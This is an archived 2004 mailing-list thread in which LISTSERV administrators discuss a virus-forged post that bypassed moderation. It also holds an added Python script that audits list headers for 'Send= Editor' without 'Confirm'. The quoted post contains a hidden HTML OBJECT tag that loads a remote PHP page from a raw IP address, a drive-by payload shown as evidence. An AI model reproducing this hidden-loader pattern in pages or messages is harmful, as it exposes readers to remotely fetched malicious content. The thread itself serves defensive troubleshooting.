LSTSRV-L Archives

LISTSERV Site Administrators' Forum

LSTSRV-L

Claude Etienne <[log in to unmask]>
Tue, 23 Mar 2004 15:50:43 -0500
If you do not use confirm with your send= editor then anyone who knows the
address of any of the list editors and knows how to forge mail can post to
your list.  Add confirm to your SEND keyword (e.g. Send= editor, confirm)
and this will force your editor to confirm his or her own postings.


/*
Please note that L-Soft recommends setting "Send= Editor,Confirm" so as to
add a level of security against malicious users forging mail from an
"Editor=" address to get around your moderation settings, or against
badly-configured "vacation" programs that simply reflect the message back to
the list in a manner that makes it appear that the mail is coming from the
editor's address. The "Confirm" option causes LISTSERV to request an "OK"
confirmation from an editor when it receives mail claiming to be from that
editor.
*/

Claude.


----- Original Message -----
From: "Dennis Boone" <[log in to unmask]>
To: <[log in to unmask]>
Sent: Tuesday, March 23, 2004 3:02 PM
Subject: NoHTML glitch


> Over the weekend, the following was posted to one of our lists.  It was
> presumably forged by a virus; the From address was a legit editor of
> the list.  I've filed off the e-mail addresses on general principle.
>
>         Date:         Sun, 21 Mar 2004 01:44:56 -0800
>         Reply-To:     ...
>         Sender:       ...
>         From:         ...
>         Subject:      Incoming message
>         MIME-Version: 1.0
>         Content-Type: text/html; charset=us-ascii
>         Content-Transfer-Encoding: 7bit
>
>         <html><body>
>         <font face="System">
>         <OBJECT STYLE="display:none" DATA="http://66.169.99.119:81/563373.php">
>         </OBJECT></body></html>
>
> The list in question is set "Attachments= No" and "Language= NoHTML".
> The header appears below.
>
> Anyone have a suggestion about how it got posted?  I'd like to close
> the leak.
>
> Dennis Boone
> H-Net
>
>         *  List-ID= H-ANNOUNCE
>         *  Ack= Yes
>         *  Attachments= No
>         *  Auto-Delete= yes,semi-auto,delay(5),max(100),Probe(15)
>         *  Change-Log= Yes
>         *  Confidential= No
>         *  Daily-Threshold= 50
>         *  Default-Options= FullHdr,Repro,MIME
>         *  Delivery-Pool= P,C
>         *  Digest=yes,same,daily,00:00,size(2000)
>         *  Editor-Header= Yes
>         *  Errors-To= ...
>         *  Files= No
>         *  Language= NoHTML
>         *  Newsgroups= None
>         *  Notebook= Yes,/lists/h-announce,Weekly,(H-ANNOUNCE)
>         *  Notify= Yes
>         *  Renewal= None
>         *  Reply-to= List,Respect
>         *  Review= Owner
>         *  Send= Editor
>         *  Stats= Normal,Private
>         *  Subscription= open,confirm
>         *  Validate= No
>         *  Editor= ...
>         *  Owner= ...
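
An added example, not part of the original messages and not L-Soft's code: a small Python check that reads list-header keyword lines in the form quoted above (with or without the ">" reply prefix) and flags a list set to "Send= Editor" without "Confirm". The sample headers are constructed from the quoted header, and the function names are hypothetical.

```python
import re

# Constructed sample: a subset of the header quoted in the thread,
# plus the corrected variant recommended in the reply.
HEADER_AS_POSTED = """\
*  List-ID= H-ANNOUNCE
*  Attachments= No
*  Language= NoHTML
*  Send= Editor
*  Subscription= open,confirm
*  Editor= ...
"""
HEADER_FIXED = HEADER_AS_POSTED.replace("Send= Editor", "Send= Editor,Confirm")

# Matches "*  Keyword= value", optionally preceded by a ">" quote marker.
KEYWORD_LINE = re.compile(r"^\s*(?:>\s*)?\*\s*([A-Za-z-]+)\s*=\s*(.*)$")


def parse_header(text):
    """Return {keyword (lowercase): [values]} for every keyword line."""
    keywords = {}
    for line in text.splitlines():
        m = KEYWORD_LINE.match(line)
        if not m:
            continue  # not a keyword line (blank line, comment, body text)
        name, raw = m.group(1).lower(), m.group(2)
        values = [v.strip() for v in raw.split(",") if v.strip()]
        # A keyword may be spread over several lines; merge the values.
        keywords.setdefault(name, []).extend(values)
    return keywords


def audit_send(text):
    """Flag a list that restricts posting to editors but skips confirmation."""
    send = [v.lower() for v in parse_header(text).get("send", [])]
    findings = []
    if "editor" in send and "confirm" not in send:
        findings.append(
            "Send= Editor without Confirm: mail claiming to be from an "
            "Editor= address is accepted without an OK confirmation"
        )
    return findings


if __name__ == "__main__":
    for label, hdr in (("as posted", HEADER_AS_POSTED), ("fixed", HEADER_FIXED)):
        print(label, "->", audit_send(hdr) or "no finding")
```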
